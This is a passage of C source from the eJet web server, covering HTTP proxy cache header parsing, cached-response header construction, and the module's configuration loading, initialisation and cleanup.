if (ret > 1) buf[ret] = '_';
} else if (buf[ret] == '?') buf[ret] = '_';
#if defined(_WIN32) || defined(_WIN64)
else if (buf[ret] == '/') buf[ret] = '\\';
#endif
}
msg->res_file_name = str_dup(buf, strlen(buf));
if (file_is_regular(msg->res_file_name)) {
msg->res_file_cache = 3;
incache = 2;
}
cacinfo = msg->res_cache_info = cache_info_open(mgmt, buf);
if (!cacinfo) {
msg->res_file_cache = 0;
return msg->res_file_cache;
}
if (incache <= 0) {
/* check the client request data is in local cache completely.
if client request contains Range header, then we should seek to given pos */
incache = http_request_in_cache(msg);
/* if request file is in local cache, and local cache file has stored all file data.
or request Ranges data are found in local cache, just return 3 to indicate
the response is from local cache file */
if (incache || frag_pack_complete(cacinfo->frag)) {
msg->res_file_cache = 4;
}
}
return msg->res_file_cache;
}
static char * str2int64 (char * pbgn, int len, int64 * pval)
{
int64 val = 0;
int i;
for (i = 0; i < len && isdigit(pbgn[i]); i++) {
val *= 10; val += pbgn[i] - '0';
}
if (pval) *pval = val;
return pbgn + i;
}
int http_proxy_cache_parse (void * vmsg, void * vclimsg, int * resend)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMsg * climsg = (HTTPMsg *)vclimsg;
CacheInfo * cacinfo = NULL;
HeaderUnit * punit = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
int len = 0;
uint8 directive = 0; //0-max-age 1-no cache 2-no store
uint8 revalidate = 0; //0-none 1-must-revalidate
uint8 pubattr = 0; //0-unknonw 1-public 2-private(only browser cache)
time_t expire = 0;
int maxage = 0;
time_t mtime = 0;
char etag[36] = {0};
uint8 hasrange = 0;
int64 start = 0;
int64 end = 0;
int64 size = 0;
char * plist[8];
int plen[8];
int i, num;
if (resend) *resend = 0;
if (!msg) return -1;
if (!climsg) return -1;
if (!msg->cacheon) return -100;
if (climsg->issued) return 0;
if (msg->res_status >= 300 || msg->res_status < 200) {
msg->cacheon = 0;
climsg->cacheon = 0;
return -200;
}
punit = http_header_get(msg, 1, "Expires", -1);
if (punit && punit->valuelen > 0) {
str_gmt2time(HUValue(punit), punit->valuelen, &expire);
}
punit = http_header_get(msg, 1, "Last-Modified", -1);
if (punit && punit->valuelen > 0) {
str_gmt2time(HUValue(punit), punit->valuelen, &mtime);
}
memset(etag, 0, sizeof(etag));
punit = http_header_get(msg, 1, "ETag", -1);
if (punit && punit->valuelen > 0) {
pbgn = HUValue(punit);
pend = pbgn + punit->valuelen;
poct = skipTo(pbgn, pend-pbgn, "\"", 1);
if (poct >= pend) {
len = pend - pbgn;
} else {
pbgn = poct + 1;
poct = skipTo(pbgn, pend-pbgn, "\"", 1);
len = poct - pbgn;
}
str_secpy(etag, sizeof(etag)-1, pbgn, len);
}
punit = http_header_get(msg, 1, "Cache-Control", -1);
if (punit && punit->valuelen > 0) {
num = string_tokenize(HUValue(punit), punit->valuelen, ",", 1, (void **)plist, plen, 8);
for (i = 0; i < num; i++) {
pbgn = plist[i];
pend = pbgn + plen[i];
pbgn = skipOver(pbgn, pend-pbgn, ", \t", 3);
poct = rskipOver(pend-1, pend-pbgn, ", \t", 3);
if (poct < pbgn) continue;
pend = poct + 1;
len = pend - pbgn;
if (len >= 8 && strncasecmp(pbgn, "no-cache", 8) == 0) {
directive = 1; //no cache
} else if (len >= 8 && strncasecmp(pbgn, "no-store", 8) == 0) {
directive = 2; //no store
} else if (len >= 7 && strncasecmp(pbgn, "max-age", 7) == 0) {
directive = 0; //max-age
pbgn = skipTo(pbgn + 7, pend-pbgn-7, "=", 1);
if (pbgn > pend) {
maxage = 0;
} else {
pbgn = skipOver(pbgn, pend-pbgn, "= \t", 3);
if (isdigit(*pbgn))
maxage = str_to_int(pbgn, pend-pbgn, 10, NULL);
else
maxage = 0;
}
} else if (len >= 15 && strncasecmp(pbgn, "must-revalidate", 15) == 0) {
revalidate = 1; //must-revalidate
} else if (len >= 6 && strncasecmp(pbgn, "public", 6) == 0) {
pubattr = 1; //public
} else if (len >= 7 && strncasecmp(pbgn, "private", 7) == 0) {
pubattr = 2; //private
}
}
}
if (directive > 0 || /* no-cache or no-store */
(directive == 0 && maxage == 0) || /* max-age set but value is 0 */
revalidate) /* set must-revalidate directive */
{
climsg->cacheon = 0;
msg->cacheon = 0;
if (climsg->res_cache_info) {
cache_info_close(climsg->res_cache_info);
climsg->res_cache_info = NULL;
}
/* now check if the proxy response body is original requested Range */
if (climsg->cache_req_start != climsg->cache_req_off) {
if (resend) *resend = 1;
}
}
if (!msg->cacheon) return 0;
punit = http_header_get(msg, 1, "Content-Range", -1);
if (punit && punit->valuelen >= 5) { //Content-Range: bytes 1000-5000/29387
pbgn = HUValue(punit);
pend = pbgn + punit->valuelen;
if (strncasecmp(pbgn, "bytes", 5) == 0) {
pbgn = skipOver(pbgn+5, pend-pbgn-5, " \t\r\n\f\v", 6);
num = string_tokenize(pbgn, pend-pbgn, "-/ \t", 4, (void **)plist, plen, 8);
if (num > 0) str2int64(plist[0], plen[0], &start);
if (num > 1) str2int64(plist[1], plen[1], &end);
if (num > 2) str2int64(plist[2], plen[2], &size);
hasrange = 1;
}
}
if ((cacinfo = climsg->res_cache_info) == NULL) {
cacinfo = cache_info_create (msg->httpmgmt,
climsg->res_file_name,
msg->res_body_length);
if (!cacinfo) {
msg->cacheon = climsg->cacheon = 0;
return -200;
}
climsg->res_cache_info = cacinfo;
}
EnterCriticalSection(&cacinfo->cacheCS);
cacinfo->directive = directive;
cacinfo->revalidate = revalidate;
cacinfo->pubattr = pubattr;
if (cacinfo->ctime == 0)
cacinfo->ctime = time(NULL);
cacinfo->expire = expire;
cacinfo->maxage = maxage;
cacinfo->mtime = mtime;
if (cacinfo->mtime == 0)
cacinfo->mtime = time(NULL);
str_secpy(cacinfo->etag, sizeof(cacinfo->etag), etag, strlen(etag));
msg->GetResContentTypeID(msg, &cacinfo->mimeid, NULL);
cacinfo->body_flag = msg->res_body_flag;
cacinfo->header_length = msg->res_header_length;
if (msg->res_body_length > 0 &&
climsg->cache_req_off == 0 &&
climsg->cache_req_len < 0)
cacinfo->body_length = msg->res_body_length;
climsg->res_file_handle = native_file_open(cacinfo->cache_tmp, NF_READ | NF_WRITE);
if (hasrange) {
num = native_file_seek(climsg->res_file_handle, start);
if (size > 0) {
if (cacinfo->body_length != size)
cacinfo->body_length = size;
if (frag_pack_length(cacinfo->frag) != size)
frag_pack_set_length(cacinfo->frag, size);
}
} else {
num = native_file_seek(climsg->res_file_handle, climsg->cache_req_start);
}
cache_info_write_meta(cacinfo);
LeaveCriticalSection(&cacinfo->cacheCS);
return 1;
}
int http_proxy_cache_complete (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
CacheInfo * cacinfo = NULL;
if (!msg) return -1;
if (!msg->cacheon) return -100;
cacinfo = (CacheInfo *)msg->res_cache_info;
if (!cacinfo) return -101;
if (frag_pack_complete(cacinfo->frag)) {
/* cache file has gotton all bytes, now copy or rename to origin file */
if (strcmp(cacinfo->cache_file, msg->res_file_name) != 0)
rename(cacinfo->cache_file, msg->res_file_name);
}
return 0;
}
int http_cache_response_header (void * vmsg, void * vcacinfo)
{
HTTPMsg * climsg = (HTTPMsg *)vmsg;
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
http_partial_t * part = NULL;
int64 start = 0;
int64 end = 0;
int64 length = 0;
char buf[128];
if (!climsg) return -1;
if (!cacinfo) cacinfo = (CacheInfo *)climsg->res_cache_info;
if (!cacinfo) return -3;
http_header_del(climsg, 1, "ETag", 4);
http_header_del(climsg, 1, "Content-Length", 14);
http_header_del(climsg, 1, "Content-Range", 13);
http_header_del(climsg, 1, "Transfer-Encoding", 17);
if (cacinfo->body_length > 0) {
climsg->res_body_flag = BC_CONTENT_LENGTH;
if (climsg->partial_flag > 0) {
part = vstar_get(climsg->partial_list, 0);
switch (part->partflag) {
case 1:
start = part->start >= cacinfo->body_length ? cacinfo->body_length : part->start;
end = part->end >= cacinfo->body_length ? cacinfo->body_length - 1 : part->end;
length = end - start + 1;
break;
case 2:
start = part->start >= cacinfo->body_length ? cacinfo->body_length : part->start;
length = cacinfo->body_length - start;
end = start + length - 1;
break;
case 3:
length = part->length > cacinfo->body_length ? cacinfo->body_length : part->length;
start = cacinfo->body_length - length;
end = cacinfo->body_length - 1;
}
climsg->res_body_length = length;
http_header_append_int64(climsg, 1, "Content-Length", 14, length);
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf, "bytes %I64d-%I64d/%I64d", start, end, cacinfo->body_length);
#else
sprintf(buf, "bytes %lld-%lld/%lld", start, end, cacinfo->body_length);
#endif
http_header_append(climsg, 1, "Content-Range", 13, buf, strlen(buf));
if (length < cacinfo->body_length) {
if (climsg->res_status >= 200 && climsg->res_status < 300)
climsg->SetStatus(climsg, 206, NULL);
} else {
if (climsg->res_status > 200 && climsg->res_status < 300)
climsg->SetStatus(climsg, 200, NULL);
}
} else {
http_header_append_int64(climsg, 1, "Content-Length", 14, cacinfo->body_length);
climsg->res_body_length = cacinfo->body_length;
if (climsg->res_status > 200 && climsg->res_status < 300)
climsg->SetStatus(climsg, 200, NULL);
}
} else {
climsg->res_body_flag = BC_TE;
http_header_append(climsg, 1, "Transfer-Encoding", 17, "chunked", 7);
}
if (cacinfo->expire > 0 && http_header_get(climsg, 1, "Expires", 7) == NULL) {
str_time2gmt(&cacinfo->expire, buf, sizeof(buf)-1, 0);
http_header_append(climsg, 1, "Expires", 7, buf, strlen(buf));
}
if (cacinfo->maxage > 0 && http_header_get(climsg, 1, "Cache-Control", 13) == NULL) {
sprintf(buf, "max-age=%d", cacinfo->maxage);
if (cacinfo->pubattr == 1) {
sprintf(buf + strlen(buf), ", public");
} else if (cacinfo->pubattr == 2) {
sprintf(buf + strlen(buf), ", private");
}
http_header_append(climsg, 1, "Cache-Control", 13, buf, strlen(buf));
}
return 0;
}
<|start_filename|>include/http_log.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_LOG_H_
#define _HTTP_LOG_H_
#ifdef __cplusplus
extern "C" {
#endif
typedef struct http_log_ {
/* log config info */
uint8 enable; /* get from conf */
char * logfile; /* get from conf */
CRITICAL_SECTION logCS;
/* allocated space for log conent of HTTPMsg */
frame_p format;
char * logcont;
int loglen;
FILE * fp;
void * mgmt;
} HTTPLog, http_log_t;
void * http_log_init (void * vmgmt);
int http_log_clean (void * vlog);
int http_log_write (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_status.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_STATUS_H_
#define _HTTP_STATUS_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_status_init (void * vmgmt);
int http_status_cleanup (void * vmgmt);
int http_get_status (void * vmgmt, char * status, int statuslen, char ** preason);
int http_get_status2 (void * vmgmt, int status, char ** preason);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_mgmt.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_header.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_srv.h"
#include "http_con.h"
#include "http_listen.h"
#include "http_status.h"
#include "http_sndpxy.h"
#include "http_pump.h"
#include "http_request.h"
#include "http_response.h"
#include "http_handle.h"
#include "http_cookie.h"
#include "http_ssl.h"
#include "http_variable.h"
#include "http_fcgi_srv.h"
#include "http_log.h"
#include "http_cache.h"
#include "http_script.h"
char * g_http_version = "1.2.6";
char * g_http_build = "eJet/1.2.6 Web Server built "__DATE__" "__TIME__" "
"by <EMAIL>";
char * g_http_author = "<NAME> <<EMAIL>>";
HTTPMgmt * gp_httpmgmt = NULL;
int http_mgmt_get_conf (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
char key[256];
int keylen = 0;
int ret = 0;
char * pstr = NULL;
if (!mgmt) return -1;
mgmt->conn_check_interval = 3;
mgmt->srv_check_interval = 5;
/* when receiving client request, configuration as following */
sprintf(key, "http.url not escape char"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->uri_unescape_char, NULL);
if (ret <= 0)
mgmt->uri_unescape_char = "-_.~!*'();:@&=+$,/?#][";
sprintf(key, "http.cookie file"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->cookie_file, NULL);
if (ret <= 0)
mgmt->cookie_file = "./cookie.txt";
sprintf(key, "http.receive request.max header size"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_max_header_size);
if (ret <= 0)
mgmt->cli_max_header_size = 32*1024;
sprintf(key, "http.receive request.body cache"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&pstr, NULL);
if (ret <= 0 || !pstr) mgmt->cli_body_cache = 0;
if (pstr && strcasecmp(pstr, "on") == 0)
mgmt->cli_body_cache = 1;
else
mgmt->cli_body_cache = 0;
sprintf(key, "http.receive request.body cache threshold"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_body_cache_threshold);
if (ret <= 0)
mgmt->cli_body_cache_threshold = 64*1024;
sprintf(key, "http.receive request.keepalive timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_keepalive_time);
if (ret <= 0)
mgmt->cli_keepalive_time = 30;
sprintf(key, "http.receive request.connection idle timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_conn_idle_time);
if (ret <= 0)
mgmt->cli_conn_idle_time = 10;
sprintf(key, "http.receive request.header idle timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_header_idletime);
if (ret <= 0)
mgmt->cli_header_idletime = 10;
sprintf(key, "http.receive request.header timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_header_time);
if (ret <= 0)
mgmt->cli_header_time = 30;
sprintf(key, "http.receive request.request handle timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->cli_request_handle_time);
if (ret <= 0)
mgmt->cli_request_handle_time = 180;
/* when sending request to remote origin server, configuration as following */
sprintf(key, "http.send request.max header size"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->srv_max_header_size);
if (ret <= 0)
mgmt->srv_max_header_size = 32*1024;
sprintf(key, "http.send request.connecting timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->srv_connecting_time);
if (ret <= 0)
mgmt->srv_connecting_time = 8;
sprintf(key, "http.send request.keepalive timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->srv_keepalive_time);
if (ret <= 0)
mgmt->srv_keepalive_time = 10;
sprintf(key, "http.send request.connection idle timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->srv_conn_idle_time);
if (ret <= 0)
mgmt->srv_conn_idle_time = 180;
/* When seinding request to origin server by HTTPS/SSL connection, current web server
will served as SSL client. if strict client authentication is required by SSL peer,
the certificate, private key and CA verifying chain certificates will be provided. */
sprintf(key, "http.send request.ssl certificate"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->srv_con_cert, NULL);
if (ret <= 0)
mgmt->srv_con_cert = NULL;
sprintf(key, "http.send request.ssl private key"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->srv_con_prikey, NULL);
if (ret <= 0)
mgmt->srv_con_prikey = NULL;
sprintf(key, "http.send request.ssl ca certificate"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->srv_con_cacert, NULL);
if (ret <= 0)
mgmt->srv_con_cacert = NULL;
sprintf(key, "http.send request.root"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->srv_resp_root, NULL);
if (ret <= 0)
mgmt->srv_resp_root = NULL;
sprintf(key, "http.send request.cache"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&pstr, NULL);
if (ret <= 0 || !pstr) mgmt->srv_resp_cache = 0;
if (pstr && strcasecmp(pstr, "on") == 0)
mgmt->srv_resp_cache = 1;
else
mgmt->srv_resp_cache = 0;
sprintf(key, "http.send request.cache file"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&mgmt->srv_resp_cache_file, NULL);
if (ret <= 0)
mgmt->srv_resp_cache_file = NULL;
/* proxy configuration */
sprintf(key, "http.proxy.connect tunnel"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&pstr, NULL);
if (ret <= 0 || !pstr) mgmt->proxy_tunnel = 0;
if (pstr && strcasecmp(pstr, "on") == 0)
mgmt->proxy_tunnel = 1;
else
mgmt->proxy_tunnel = 0;
sprintf(key, "http.proxy.tunnel keepalive timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->tunnel_keepalive_time);
if (ret <= 0)
mgmt->tunnel_keepalive_time = 60;
sprintf(key, "http.proxy.auto redirect"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&pstr, NULL);
if (ret <= 0 || !pstr) mgmt->auto_redirect = 0;
if (pstr && strcasecmp(pstr, "on") == 0)
mgmt->auto_redirect = 1;
else
mgmt->auto_redirect = 0;
sprintf(key, "http.proxy.buffer size"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->proxy_buffer_size);
if (ret <= 0)
mgmt->proxy_buffer_size = 256*1024;
/* FastCGI interface parameters, maintaining TCP/UnixSock connection to FCGI server */
sprintf(key, "http.fastcgi.connecting timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->fcgi_connecting_time);
if (ret <= 0)
mgmt->fcgi_connecting_time = 10;
sprintf(key, "http.fastcgi.keepalive timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->fcgi_keepalive_time);
if (ret <= 0)
mgmt->fcgi_keepalive_time = 30;
sprintf(key, "http.fastcgi.connection idle timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->fcgi_conn_idle_time);
if (ret <= 0)
mgmt->fcgi_conn_idle_time = 90;
sprintf(key, "http.fastcgi.fcgi server alive timeout"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->fcgi_srv_alive_time);
if (ret <= 0)
mgmt->fcgi_srv_alive_time = 120;
sprintf(key, "http.fastcgi.buffer size"); keylen = strlen(key);
ret = json_mget_int(mgmt->cnfjson, key, keylen, &mgmt->fcgi_buffer_size);
if (ret <= 0)
mgmt->fcgi_buffer_size = 256*1024;
return 0;
}
void * http_mgmt_alloc (void * pcore, char * confname, int extsize, int msgextsize)
{
HTTPMgmt * mgmt = NULL;
if (extsize < 1) extsize = 1;
if (msgextsize < 1) msgextsize = 1;
mgmt = (HTTPMgmt *)kzalloc(sizeof(*mgmt) - 1 + extsize);
if (!mgmt) return NULL;
tolog(0, "\n");
tolog(1, "eJet - HTTP module allocated.\n");
strcpy(mgmt->httpver0, "HTTP/1.0");
strcpy(mgmt->httpver1, "HTTP/1.1");
mgmt->header_num = 71;
sprintf(mgmt->useragent, "eJet/%s", g_http_version);
mgmt->addrnum = get_selfaddr(6, mgmt->localaddr);
mgmt->cnfjson = json_init(1, 1, 1);
if (confname) {
json_decode_file(mgmt->cnfjson, confname, strlen(confname), 0, 0);
}
http_mgmt_get_conf(mgmt);
tolog(1, "eJet - Json Conf '%s' read.\n", confname);
file_abspath(confname, mgmt->root_path, sizeof(mgmt->root_path)-1);
#ifdef UNIX
chdir(mgmt->root_path);
#elif defined(_WIN32) || defined(_WIN64)
SetCurrentDirectory(mgmt->root_path);
#endif
tolog(1, "eJet - Working Path '%s' set\n", mgmt->root_path);
mgmt->mimemgmt_alloc = 0;
GetRandStr(mgmt->uploadso, 18, 0);
GetRandStr(mgmt->shellcmdso, 20, 0);
GetRandStr(mgmt->uploadvar, 10, 0);
GetRandStr(mgmt->shellcmdvar, 8, 0);
strcat((char *)mgmt->uploadso, ".so");
strcat((char *)mgmt->shellcmdso, ".so");
mgmt->msgextsize = msgextsize;
mgmt->pcore = pcore;
gp_httpmgmt = mgmt;
return mgmt;
}
int http_mgmt_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
#ifdef HAVE_OPENSSL
http_ssl_library_init();
#endif
http_uri_escape_init(mgmt);
http_send_proxy_init(mgmt);
if (mgmt->msgextsize <= 0) mgmt->msgextsize = 1;
mgmt->httplog = http_log_init(mgmt);
mgmt->conid = 1;
InitializeCriticalSection(&mgmt->conCS);
mgmt->con_table = ht_only_new(800, http_con_cmp_conid);
ht_set_hash_func(mgmt->con_table, http_con_hash_func);
mgmt->msgid = 0;
InitializeCriticalSection(&mgmt->msgidCS);
InitializeCriticalSection(&mgmt->msgtableCS);
mgmt->msg_table = ht_only_new(600, http_msg_cmp_msgid);
ht_set_hash_func(mgmt->msg_table, http_msg_hash_msgid);
if (!mgmt->con_pool) {
mgmt->con_pool = bpool_init(NULL);
bpool_set_initfunc (mgmt->con_pool, http_con_init);
bpool_set_freefunc (mgmt->con_pool, http_con_free);
bpool_set_unitsize(mgmt->con_pool, sizeof(HTTPCon));
bpool_set_allocnum(mgmt->con_pool, 64);
}
if (!mgmt->msg_pool) {
mgmt->msg_pool = bpool_init(NULL);
bpool_set_freefunc(mgmt->msg_pool, http_msg_free);
bpool_set_unitsize(mgmt->msg_pool, sizeof(HTTPMsg) - 1 + mgmt->msgextsize);
bpool_set_allocnum(mgmt->msg_pool, 128);
}
if (!mgmt->header_unit_pool) {
mgmt->header_unit_pool = bpool_init(NULL);
bpool_set_freefunc(mgmt->header_unit_pool, hunit_free);
bpool_set_unitsize(mgmt->header_unit_pool, sizeof(HeaderUnit));
bpool_set_allocnum(mgmt->header_unit_pool, 256);
}
if (!mgmt->frame_pool) {
mgmt->frame_pool = bpool_init(NULL);
bpool_set_initfunc(mgmt->frame_pool, frame_empty);
bpool_set_freefunc(mgmt->frame_pool, frame_free);
bpool_set_unitsize(mgmt->frame_pool, sizeof(frame_t));
bpool_set_allocnum(mgmt->frame_pool, 64);
//bpool_set_getsizefunc(mgmt->frame_pool, frame_size);
//bpool_set_freesize(mgmt->frame_pool, 32*1024);
}
if (!mgmt->mimemgmt) {
mgmt->mimemgmt = mime_type_init();
mgmt->mimemgmt_alloc = 1;
}
http_conf_mime_init(mgmt);
http_cache_info_init(mgmt);
http_var_init(mgmt);
http_status_init(mgmt);
http_mgmt_srv_init(mgmt);
if (mgmt->srv_sslctx == NULL) {
#ifdef HAVE_OPENSSL
mgmt->srv_sslctx = http_ssl_client_ctx_init(mgmt->srv_con_cert,
mgmt->srv_con_prikey, mgmt->srv_con_cacert);
#endif
}
InitializeCriticalSection(&mgmt->countCS);
gettimeofday(&mgmt->count_tick, NULL);
mgmt->total_recv = 0;
mgmt->total_sent = 0;
if (mgmt->objinit)
(*mgmt->objinit)(mgmt, &mgmt->extdata[0], mgmt->hobjconf);
http_mgmt_fcgisrv_init(mgmt);
mgmt->cookiemgmt = cookie_mgmt_alloc(mgmt, mgmt->cookie_file);
script_parser_init();
http_listen_init(mgmt);
tolog(0, "\n");
return 0;
}
int http_mgmt_cleanup (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
tolog(0, "\n");
script_parser_clean();
http_var_free(mgmt);
if (mgmt->srv_sslctx) {
#ifdef HAVE_OPENSSL
http_ssl_ctx_free(mgmt->srv_sslctx);
#endif
mgmt->srv_sslctx = NULL;
}
http_listen_cleanup(mgmt);
if (mgmt->mimemgmt && mgmt->mimemgmt_alloc) {
mime_type_clean(mgmt->mimemgmt);
mgmt->mimemgmt = NULL;
mgmt->mimemgmt_alloc = 0;
}
http_conf_mime_clean(mgmt);
DeleteCriticalSection(&mgmt->conCS);
if (mgmt->con_table) {
ht_free_all(mgmt->con_table, http_con_free);
mgmt->con_table = NULL;
}
cookie_mgmt_free(mgmt->cookiemgmt);
http_mgmt_srv_clean(mgmt);
http_status_cleanup(mgmt);
http_send_proxy_clean(mgmt);
DeleteCriticalSection(&mgmt->msgidCS);
DeleteCriticalSection(&mgmt->msgtableCS);
ht_free_all(mgmt->msg_table, http_msg_free);
http_mgmt_fcgisrv_clean(mgmt);
if (mgmt->con_pool) {
bpool_clean(mgmt->con_pool);
mgmt->con_pool = NULL;
}
if (mgmt->msg_pool) {
bpool_clean(mgmt->msg_pool);
mgmt->msg_pool = NULL;
}
if (mgmt->header_unit_pool) {
bpool_clean(mgmt->header_unit_pool);
mgmt->header_unit_pool = NULL;
}
if (mgmt->frame_pool) {
bpool_clean(mgmt->frame_pool);
mgmt->frame_pool = NULL;
}
/* application-layer resource release now */
if (mgmt->objclean)
(*mgmt->objclean)(&mgmt->extdata[0]);
if (mgmt->httplog) {
http_log_clean(mgmt->httplog);
mgmt->httplog = NULL;
}
http_cache_info_clean(mgmt);
mgmt->pcore = NULL;
if (mgmt->cnfjson) {
json_clean(mgmt->cnfjson);
mgmt->cnfjson = NULL;
}
DeleteCriticalSection(&mgmt->countCS);
gp_httpmgmt = NULL;
kfree(mgmt);
tolog(1, "eJet - HTTP module exited.\n");
tolog(0, "\n");
return 0;
}
int http_mgmt_obj_init (void * vmgmt, HTTPObjInit * objinit, void * hconf)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->objinit = objinit;
mgmt->hobjconf = hconf;
return 0;
}
int http_mgmt_obj_clean (void * vmgmt, HTTPObjClean * objclean)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->objclean = objclean;
return 0;
}
void * http_mgmt_obj (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return &mgmt->extdata[0];
}
void http_uri_escape_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
int i, len;
if (!mgmt) return;
for (i = 0; i < 8; i++) {
mgmt->uri_bitmask[i] = 0xFFFFFFFF;
}
for (i = 0; i < 26; i++) {
bit_mask_unset(mgmt->uri_bitmask, 'a' + i);
}
for (i = 0; i < 26; i++) {
bit_mask_unset(mgmt->uri_bitmask, 'A' + i);
}
for (i = 0; i < 10; i++) {
bit_mask_unset(mgmt->uri_bitmask, '0' + i);
}
len = str_len(mgmt->uri_unescape_char);
for (i = 0; i <len; i++) {
bit_mask_unset(mgmt->uri_bitmask, mgmt->uri_unescape_char[i]);
}
tolog(1, "eJet - Bit-Mask for URI-escape/unescape set.\n");
return;
}
void http_overhead (void * vmgmt, uint64 * recv, uint64 * sent,
struct timeval * lasttick, int reset, struct timeval * curt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return;
EnterCriticalSection(&mgmt->countCS);
if (recv) *recv = mgmt->total_recv;
if (sent) *sent = mgmt->total_sent;
if (lasttick) *lasttick = mgmt->count_tick;
if (reset) {
if (curt) mgmt->count_tick = *curt;
else gettimeofday(&mgmt->count_tick, NULL);
mgmt->total_recv = 0;
mgmt->total_sent = 0;
}
LeaveCriticalSection(&mgmt->countCS);
}
void http_overhead_sent (void * vmgmt, long sent)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return;
EnterCriticalSection(&mgmt->countCS);
mgmt->total_sent += sent;
LeaveCriticalSection(&mgmt->countCS);
}
void http_overhead_recv (void * vmgmt, long recv)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return;
EnterCriticalSection(&mgmt->countCS);
mgmt->total_recv += recv;
LeaveCriticalSection(&mgmt->countCS);
}
int http_set_reqhandler (void * vmgmt, HTTPCBHandler * reqhandler, void * cbobj)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->req_handler = reqhandler;
mgmt->req_cbobj = cbobj;
return 0;
}
int http_set_reqcheck(void * vmgmt, HTTPCBHandler * reqcheck, void * checkobj)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->req_check = reqcheck;
mgmt->req_checkobj = checkobj;
return 0;
}
int http_set_rescheck(void * vmgmt, HTTPCBHandler * rescheck, void * checkobj)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
mgmt->res_check = rescheck;
mgmt->res_checkobj = checkobj;
return 0;
}
int http_mgmt_con_add (void * vmgmt, void * vcon)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = (HTTPCon *)vcon;
if (!mgmt) return -1;
if (!pcon) return -2;
EnterCriticalSection(&mgmt->conCS);
ht_set(mgmt->con_table, &pcon->conid, pcon);
LeaveCriticalSection(&mgmt->conCS);
return 0;
}
void * http_mgmt_con_get (void * vmgmt, ulong conid)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = NULL;
if (!mgmt) return NULL;
